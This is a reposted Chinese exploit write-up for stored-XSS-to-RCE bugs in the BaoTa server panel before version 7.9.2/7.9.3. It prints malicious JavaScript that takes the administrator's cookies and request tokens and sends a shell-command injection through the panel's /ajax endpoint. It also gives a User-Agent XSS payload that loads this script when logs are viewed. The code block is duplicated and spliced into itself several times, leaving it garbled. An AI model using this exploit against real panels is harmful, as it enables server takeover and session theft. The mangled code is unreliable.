宝塔面板前台RCE
2022-10-29 09:59:41 Author: 利刃信安(查看原文) 阅读量:51 收藏

RCE1

版本 < 7.9.2

恶意 js

//JQuery preload (optional)(function(){    var s = document.createElement('script');s.type = 'text/javascript';s.async = true;s.src = 'https://code.jquery.com/jquery-2.1.4.min.js';(document.getElementsByTagName('head')[0]||document.getElementsByTagName('body')[0]).appendChild(s);})();
// cookielet cookies = document.cookie;
function getCookie(sKey) {    if (!sKey) { return null; }    return decodeURIComponent(document.cookie.replace(new RegExp("(?:(?:^|.*;)\\s*" +encodeURIComponent(sKey).replace(/[\-\.\+\*]/g, "\\//JQuery preload (optional)(function(){    var s = document.createElement('script');s.type = 'text/javascript';s.async = true;s.src = 'https://code.jquery.com/jquery-2.1.4.min.js';(document.getElementsByTagName('head')[0]||document.getElementsByTagName('body')[0]).appendChild(s);})();
// cookielet cookies = document.cookie;
function getCookie(sKey) {    if (!sKey) { return null; }    return decodeURIComponent(document.cookie.replace(new RegExp("(?:(?:^|.*;)\\s*" +encodeURIComponent(sKey).replace(/[\-\.\+\*]/g, "\\$&") +"\\s*\\=\\s*([^;]*).*$)|^.*$"), "$1")) || null;}
all_headers ={    "Accept":"*/*",    "X-Requested-With":"XMLHttpRequest",    "User-Agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64)AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36",    "Connection":"close",    "Accept-Encoding":"gzip, deflate",    "dnt":"1",    "sec-gpc":"1",    "Cookie": cookies,    "x-cookie-token": getCookie('request_token'),    "Accept-Language":"zh-CN,zh;q=0.9,en;q=0.8",    "x-http-token": $('#request_token_head').attr('token'),    "Content-Type":"application/x-www-form-urlencoded;charset=UTF-8"}
$.ajax({    url: "/ajax",    type: "get",    data:        {"action":"get_lines","filename":"/etc","num":"|echo 'BT RCE test ZAC'> /www/wwwroot/1.txt|"}  //这边填写shell命令    ,    headers: all_headers,    success: function (data) {        console.info(data);    }});amp;") +"\\s*\\=\\s*([^;]*).*$)|^.*//JQuery preload (optional)(function(){    var s = document.createElement('script');s.type = 'text/javascript';s.async = true;s.src = 'https://code.jquery.com/jquery-2.1.4.min.js';(document.getElementsByTagName('head')[0]||document.getElementsByTagName('body')[0]).appendChild(s);})();
// cookielet cookies = document.cookie;
function getCookie(sKey) {    if (!sKey) { return null; }    return decodeURIComponent(document.cookie.replace(new RegExp("(?:(?:^|.*;)\\s*" +encodeURIComponent(sKey).replace(/[\-\.\+\*]/g, "\\$&") +"\\s*\\=\\s*([^;]*).*$)|^.*$"), "$1")) || null;}
all_headers ={    "Accept":"*/*",    "X-Requested-With":"XMLHttpRequest",    "User-Agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64)AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36",    "Connection":"close",    "Accept-Encoding":"gzip, deflate",    "dnt":"1",    "sec-gpc":"1",    "Cookie": cookies,    "x-cookie-token": getCookie('request_token'),    "Accept-Language":"zh-CN,zh;q=0.9,en;q=0.8",    "x-http-token": $('#request_token_head').attr('token'),    "Content-Type":"application/x-www-form-urlencoded;charset=UTF-8"}
$.ajax({    url: "/ajax",    type: "get",    data:        {"action":"get_lines","filename":"/etc","num":"|echo 'BT RCE test ZAC'> /www/wwwroot/1.txt|"}  //这边填写shell命令    ,    headers: all_headers,    success: function (data) {        console.info(data);    }});quot;), "$1")) || null;}
all_headers ={    "Accept":"*/*",    "X-Requested-With":"XMLHttpRequest",    "User-Agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64)AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36",    "Connection":"close",    "Accept-Encoding":"gzip, deflate",    "dnt":"1",    "sec-gpc":"1",    "Cookie": cookies,    "x-cookie-token": getCookie('request_token'),    "Accept-Language":"zh-CN,zh;q=0.9,en;q=0.8",    "x-http-token": $('#request_token_head').attr('token'),    "Content-Type":"application/x-www-form-urlencoded;charset=UTF-8"}
$.ajax({    url: "/ajax",    type: "get",    data:        {"action":"get_lines","filename":"/etc","num":"|echo 'BT RCE test ZAC'> /www/wwwroot/1.txt|"}  //这边填写shell命令    ,    headers: all_headers,    success: function (data) {        console.info(data);    }});

访问宝塔面板部署的网站,并替换 UA

</tExtArEa>">src=https://localhost/1.js></script>

到后台点击日志,触发 xss 导致 rce

命令执行结果

RCE2

版本 <7.9.2
原理和上面的一致,poc 也一样

触发 Nginx 报错

到后台点日志-错误日志

验证结果

RCE3

版本 <7.9.3

可以确认的是有 Xss 漏洞,但是 rec 有难度,我本地使用的是宝塔 7.6.0 验证,存在斜杠替换的问题,暂且不表。

针对 面板页面构造恶意xss

到安全-日志记录中去查找日志。

文章转载自:https://www.ankio.net/#/posts/79


文章来源: http://mp.weixin.qq.com/s?__biz=MzU1Mjk3MDY1OA==&mid=2247498815&idx=1&sn=2c49b320c2c4c018e093f0f65750b589&chksm=fbfb4cf2cc8cc5e47d9b7e8c6ee3d5430dc6a95553ca1185ce37a018935a61740d1ef59e70ac#rd
如有侵权请联系:admin#unsafe.sh